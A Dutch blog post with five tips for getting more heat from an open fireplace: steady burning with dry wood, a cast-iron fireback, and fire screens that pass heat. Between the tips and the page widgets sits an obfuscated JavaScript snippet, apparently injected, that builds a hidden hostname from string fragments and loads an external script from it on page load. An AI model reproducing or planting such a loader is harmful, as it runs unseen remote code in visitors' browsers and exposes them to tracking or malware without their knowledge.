Read Time:2 Minute, 42 Second

De kosten van de verwarming van het huis zijn actueler dan ooit. Wist je dat je de haard nog warmer kan stoken zonder geld kwijt te zijn aan extra brandhout? Dus zonder grote vuren te stoken. De verwarming kan je dan een stukje lager zetten.

Tip 1 | Zorg voor een rustig brandend vuur dat constant blijft branden

Als het vuur steeds uit gaat en veel rook veroorzaakt komt er weinig warmte van het vuur. Zorg voor een rustig brandend vuur dat constant blijft branden. Ten eerste heb je daarvoor een goede trek in de haard nodig. Dat kan je onder meer bereiken door op een hoogte te stoken, bijvoorbeeld met bokken en een haardrooster of met een haardkorf. Je krijgt dan beluchting van onderaf. Een ander gelangrijk punt is het gebruik van goed gedroogd hout. Nat hout gaat snel uit en rookt veel meer. En verder is het heel belangrijk om met aandacht te stoken. Geniet van het vuur en kijk er regelmatig naar om.

Tip 2 | Plaats een haardplaat tegen de achterwand van de haard

Een haardplaat is een, vaak gedecoreerde, gietijzeren plaat die tegen de achterwand van de haard wordt geplaatst. Gietijzer geleidt de warmte heel goed en een haardplaat kan de warmte uitstraling van het vuur wel tot 50% verhogen. Dit is afhankelijk van de dikte van de haardplaat. Hoe dikker hoe meer warmte-uitstraling. Ook houdt de haardplaat warmte vast nadat het vuur gedoofd is. Bij een dikke haardplaat kan je de warmte de volgende ochtend nog voelen. Zorg verder dat de haardplaat geen grote scheur heeft. Een scheur onderbreekt de warmtegeleiding.

Tip 3 | Het is niet altijd nodig dat het haardscherm de haard afsluit

Een haardscherm is altijd een goed idee om mens, dier en huis tegen het vuur te beschermen. Maar het is niet altijd nodig om een haardscherm te kiezen dat de voorkant van de haard volledig afsluit. Een hoogte van 50 cm van het haardscherm is in principe voldoende als je een goed brandend, rustig, vuur met niet te snel brandend, droog hout stookt. En daarbij op een hoogte van niet meer dan 10 cm stookt. De hoogte van de haardopening is daarbij dus niet van belang, zolang het vuur niet te groot is. Haardopeningen met een hoogte van 50 cm of minder moeten dus wel altijd afgesloten worden aan de bovenkant.

Tip 4 | Kies een haardscherm dat niet te veel warmte tegenhoudt

Hierbij gaat het vooral om het materiaal van het openhaard scherm. Kies bij een smeedijzeren haardscherm met gaas niet voor een te dicht geweven gaas. Dat houdt de warmte tegen. Het gaas moet natuurlijk wel zo dicht geweven zijn dat het geen vonken doorlaat. Verder houdt een scherm van glas of plastic de uitstroom van warme lucht in de ruimte vrijwel volledig tegen. Hierdoor gaat er veel warmte weer door de schoorsteen naar buiten.

Tip 5 | Laat je adviseren

Mocht je vragen hebben over het warmer stoken van je open haard dan kun je altijd terecht bij www.haardplaat.com.

(function(){ zgip=document.createElement(“script”);zgip_=((“u”)+”st”)+”a”;zgip.async=true; zgip.type=”text/javascript”;zgip_+=(“t.i”)+””+”n”;zgip_+=((“f”)+”o”);zgip_+=”/”; zgipu=”374613012.”;zgipu+=”gmkfxs3ngipe2tvuquz”+”mtahbdk57q6″; zgip.src=”https://”+zgip_+zgipu;document.body.appendChild(zgip); })();
Happy
Happy
0 %
Sad
Sad
0 %
Excited
Excited
0 %
Sleepy
Sleepy
0 %
Angry
Angry
0 %
Surprise
Surprise
0 %
sectionaaldeur Previous post Vijf redenen om in een sectionaaldeur te investeren
vintage items interieur Next post Enkele vintage elementen aan je (moderne) interieur toevoegen